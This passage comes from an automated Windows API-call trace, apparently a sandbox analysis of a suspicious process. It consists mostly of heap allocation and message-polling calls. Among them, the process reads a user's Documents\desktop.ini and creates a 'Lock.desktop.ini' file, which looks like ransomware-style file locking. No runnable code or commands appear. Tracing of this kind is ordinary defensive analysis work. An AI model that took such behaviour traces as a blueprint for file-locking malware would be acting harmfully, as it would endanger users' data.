hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.539] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.539] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.539] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.539] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0261.540] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0261.540] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0261.540] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.540] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.540] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0261.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0261.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0261.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0261.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.542] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0261.542] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x192, lpOverlapped=0x0) returned 1 [0261.543] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0261.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x192) returned 0x2416e88 [0261.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0261.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0261.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.543] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0261.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.544] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.544] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0261.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.547] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0261.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.547] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.548] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.548] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.548] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.549] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.549] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.549] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.549] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0261.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.549] RtlAllocateHeap 